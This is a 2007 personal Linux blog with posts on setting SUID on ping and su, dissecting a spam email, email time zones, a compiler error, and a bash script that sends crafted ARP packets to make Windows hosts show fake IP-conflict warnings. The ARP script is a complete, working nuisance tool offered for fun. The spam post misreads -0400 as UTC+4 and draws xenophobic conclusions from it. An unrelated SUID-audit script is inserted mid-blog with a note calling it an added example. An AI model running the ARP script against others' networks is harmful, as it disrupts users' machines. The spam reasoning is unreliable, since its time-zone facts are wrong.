Sunday, September 30, 2007

ping: icmp open socket: Operation not permitted on ubuntu

Since an update the ping command stopped working on my ubuntu system. I always get the error “ping: icmp open socket: Operation not permitted”. Because I don’t want to always use sudo with ping, I made the following change on my system:

$ ls -al /bin/ping
-rwxr-xr-x 1 root root 27140 2006-12-19 21:35 /bin/ping

is WRONG. ping must have the SUID-flag!

$ sudo chmod u+s /bin/ping

$ ls -al /bin/ping
-rwsr-xr-x 1 root root 27140 2006-12-19 21:35 /bin/ping

Now it works again.

Posted by schmidi2 at 16:13:59

su: Authentication failure on ubuntu

Since an update the su command stopped working on my ubuntu system. I always get the error “su: Authentication failure” when typing the right password. Because I need this command, I made the following change on my system:

$ ls -al /bin/su
-rwxr-xr-x 1 root root 27140 2006-12-19 21:35 /bin/su

is WRONG. su must have the SUID-flag!

$ sudo chmod u+s /bin/su

$ ls -al /bin/su
-rwsr-xr-x 1 root root 27140 2006-12-19 21:35 /bin/su

 

Yeah, I know there is sudo. But nobody has the right to forbid me from using su if I want to.

Posted by schmidi2 at 16:07:57
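A way to check the setuid state of the two binaries from the posts above before and after the chmod, as an added example that is not part of the original posts. The function names and state labels are made up here, and the check for group/other write permission goes beyond what the posts cover.

```shell
#!/bin/sh
# Added example: function names and state labels are hypothetical.

# suid_state FILE [UID] -> prints missing | no-suid | suid-ok | suid-unsafe
#   UID is the numeric owner the binary is expected to have (default 0 = root).
suid_state() {
    f=$1
    want_uid=${2:-0}
    [ -e "$f" ] || { echo missing; return 0; }
    [ -u "$f" ] || { echo no-suid; return 0; }      # -u: setuid bit is set
    mode=$(ls -ldn "$f" | awk '{print $1}')         # e.g. -rwsr-xr-x
    uid=$(ls -ldn "$f" | awk '{print $3}')          # numeric owner
    case "$mode" in
        # A setuid file that group or others can write to can be replaced
        # with other code that then runs with the owner's privileges.
        ?????w*|????????w*) echo suid-unsafe; return 0 ;;
    esac
    if [ "$uid" = "$want_uid" ]; then echo suid-ok; else echo suid-unsafe; fi
}

# audit_suid FILE... -> prints one "state path" line per file;
# returns 1 if any file is not in state suid-ok.
audit_suid() {
    rc=0
    for path in "$@"; do
        state=$(suid_state "$path")
        echo "$state $path"
        [ "$state" = suid-ok ] || rc=1
    done
    return $rc
}

# The two binaries from the posts above.
audit_suid /bin/ping /bin/su || echo "at least one binary is not setuid root"
```

A listing like `-rwxr-xr-x` from the posts shows up here as `no-suid`, and `-rwsr-xr-x` owned by root as `suid-ok`.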

Wednesday, September 19, 2007

SPAM-eMail which wasn’t filtered out

Today I got this SPAM-eMail:

From - Wed Sep 19 19:27:40 2007
X-Account-Key: account7
X-UIDL: 186724015
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path:
Received: from relay03.mediabeam.com ([194.25.41.10])
by smtp.directbox.com ([194.25.41.68]) with SMTP
for ; Wed, 19 Sep 2007 13:14:57 +0200
Received: from px.nl (37.net059085255.t-com.ne.jp [59.85.255.37])
by relay03.mediabeam.com (8.13.1/8.13.1) with SMTP id l8JBEXUD010048
for ; Wed, 19 Sep 2007 13:14:36 +0200
Reply-To: "Bettie Waller"
From: "Bettie"
Message-ID: <1333211882.547268997208@px.nl>
Date: Wed, 19 Sep 2007 07:13:03 -0400
To: <notpublished@notpublished.com>
Subject: Young Lesbian Breannas On Sofa Fucks & Teasing
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-mediaBEAM-MailScanner-Information: Spam-/VirusProtection V1.0
X-mediaBEAM-VirusProtection: clean
X-mediaBEAM-SpamScore: 3
We're glad to inform you,
Shaved French Melanie Interracial Banged On Boat
Tied Up Hentai Brittany Gets Her Beaver Tortured
http://tstfofy.ijuwyvow.cn/?md7eahrk3t9
Have a good time!
sinside out,blues reader

Because of the following criteria/reasons it should have been filtered by the AntiSPAM-engine:
  • There is not a single “Received:” line in the header that comes from the sending SMTP server
  • The subject contains words like: “Lesbian”, “Fucks” and “Teasing” which a normal user would never put in the subject
  • The Headers “Reply-To” and “From” have the same address but not the same name (“Bettie Waller” and “Bettie”). Would an eMail-client (MUA = mail user agent) like Mozilla Thunderbird do that?
  • As you can see in the Date-Header (Date: Wed, 19 Sep 2007 07:13:03 -0400), this eMail comes from afar. These countries use the time zone UTC+4: Armenia, Azerbaijan, French Southern Territories, Îles Crozet, Georgia, Mauritius, Oman, Réunion, Russia, Samara Oblast, Udmurt Republic, Scattered islands in the Indian Ocean, Glorioso Islands, Tromelin Island, Seychelles and the United Arab Emirates (found here). Most of these countries I do not even know how to spell. Why on earth can an eMail from there really NOT be a spam-eMail?
  • The sender-address “edwinmjqf@px.nl” contains a few letters in an exceptional order (like “n” followed by “m”, “q” followed by “f”, …)
  • The 7bit-encoding (“Content-Transfer-Encoding: 7bit”) is only used by old SMTP servers. If people want to send important eMails, they should use modern technology
  • The name used in the from-header (From: “Bettie” ) isn’t also used in the address.
  • The TLD “.nl” is owned by the country Netherlands and they use the time zone UTC+1, not UTC+4 as stated in the date-header
  • I never got a nonspam eMail from “.nl”
  • If I didn’t convince you yet, here is my last criterion: The mailserver of the domain “px.nl” called “mail.px.nl” doesn’t know the address “edwinmjqf@px.nl”:
    nslookup -query=MX px.nl
    telnet mail.px.nl 25

    RCPT TO:edwinmjqf@px.nl
    550 : Recipient address rejected: User unknown in virtual mailbox table

What the hell did that AntiSPAM-engine “think”?

Posted by schmidi2 at 21:01:04

Sent mails with numeric timezone +0200 instead of +0100

I asked myself why my sent eMails have the numeric timezone “+0200” even though I live in Switzerland where we are in the UTC+1 time zone.

After a short scan through my eMails I found out:

eMails sent in summer time do have the numeric timezone “+0200” like

Mail-Header:
Date: Tue, 18 Sep 2007 17:47:12 +0200

All eMails I sent in winter time (e.g. sometime in January) do have the numeric timezone “+0100” like

Mail-Header:
Date: Wed, 03 Jan 2007 10:36:59 +0100

 

This is only the case if your country has summer time (also called daylight saving time). If you don’t have it, all your eMails have the same numeric timezone. If you don’t know that, check it out here.

Wikipedia wrote it that way:
Central European Summer Time (CEST) is one of the names of UTC+2 time zone, 2 hours ahead of Coordinated Universal Time. It is used as a summer daylight saving time in most European and some North African countries. During the winter, Central European Time (UTC+1) is used.

 

By the way, I want to mention an alternative format used for absolute times (date and time including time zone). Search for “Internet Time” or go directly to the wikipedia-article:

http://en.wikipedia.org/wiki/Internet_Time

Posted by schmidi2 at 20:11:48

Tuesday, September 18, 2007

configure: error: compiler cannot create executables

I got the error message “checking for C compiler default output file name... configure: error: C compiler cannot create executables” today when trying to configure maildrop (v. 2.0.4).

/usr/src/maildrop/maildrop-2.0.4$ ./configure
checking for a BSD-compatible install... /usr/bin/install -c
checking whether build environment is sane... yes
checking for gawk... no
checking for mawk... mawk
checking whether make sets $(MAKE)... no
checking for gcc... gcc
checking for C compiler default output file name... configure: error: C compiler cannot create executables
See `config.log' for more details.

In the file “config.log” you find these lines:


configure:2326: checking for C compiler default output file name
configure:2329: gcc    conftest.c  >&5
/usr/bin/ld: crt1.o: No such file: No such file or directory
collect2: ld returned 1 exit status
configure:2332: $? = 1
configure: failed program was:
| /* confdefs.h.  */
|
| #define PACKAGE_NAME "maildrop"

configure:2371: error: C compiler cannot create executables
See `config.log' for more details.

configure: exit 77

So the file “crt1.o” is missing. Yeah, the package libc6-dev isn’t installed:

$ sudo apt-get install libc6-dev

Now it works! 

Posted by schmidi2 at 15:24:30

Sunday, September 9, 2007

Remote fake IP conflict on windows systems

Hey unix users! Below is a little script named “sendIPconflict”. With it you can force an IP conflict error message on a windows system by running it with one or more IP addresses as parameters.

——————————————————————————–
#!/bin/bash
#
# Name: sendIPconflict
# Version: 1.0
# Date: 2007-09-09 05:25pm
# Author: Benjamin Schmidt <schmidi2@directbox.com>
# License: GNU GPL
#

# Description:
# Expects one or more IPs as parameters or from STDIN (one IP per line).
# This script then sends an ARP packet to the owner of the specified IP
# and causes it (on windows-systems) to show a warning-dialog about an IP conflict.
# Note: No ARP-Spoofing is made!
#
# Requirements:
# This script needs bash and the tool send_arp/arping (on a debian-system you
# have to install the packages fake and arping).
# You must run this script as root otherwise send_arp will fail with
# the msg "socket: Operation not permitted".
#
# Use this script for education or for a little bit fun. Don't abuse it!
#

# This MAC-address is automatically generated by vmware
MY_MAC="00:0c:29:23:b8:0a"

# This script has to run as root (check this and change to root if required)
if [ $UID -ne 0 ];
then
   echo "This script needs root privileges!"
   echo "Please, type root's password..."
   su -c "$0 $1 $2 $3 $4 $5 $6 $7 $8 $9"
   exit 1
fi

# Check if required tools are available
if [ -z "$(which arping)" -o -z "$(which send_arp)" ];
then
   echo "Please install arping and send_arp to run this script!"
   echo "On a debian system you have to install the packages fake and arping."
   exit 1
fi

IPs=""

# First check parameters
while [ "$1" != "" ]; do
   IPs="$IPs $1"
   shift
done

# If no parameter was passed, listen on STDIN
if [ -z "$IPs" ];
then
   while read in; do
      IPs="$IPs $in"
   done
fi

for TARGET_IP in $IPs
do
   # First get the MAC address of the IP owner
   TARGET_MAC="$(arping -fc 1 "$TARGET_IP" 2>/dev/null | grep "Unicast" | cut -d "[" -f 2 | cut -d "]" -f 1)"
   if [ -z "$TARGET_MAC" ];
   then
      # An older version of arping doesn't work the same way
      TARGET_MAC="$(arping -c 1 "$TARGET_IP" 2>/dev/null | grep "from" | cut -d " " -f 4)"
   fi

   if [ -z "$TARGET_MAC" ];
   then
      echo "The IP $TARGET_IP is not online!"
      continue
   fi

   # Then send only to this host an ARP packet saying that its IP is now
   # also registered on my host
   send_arp "$TARGET_IP" "$MY_MAC" "$TARGET_IP" "$TARGET_MAC"

   echo "Sent IP conflict message to IP $TARGET_IP"
done
——————————————————————————–
 

Posted by schmidi2 at 16:33:49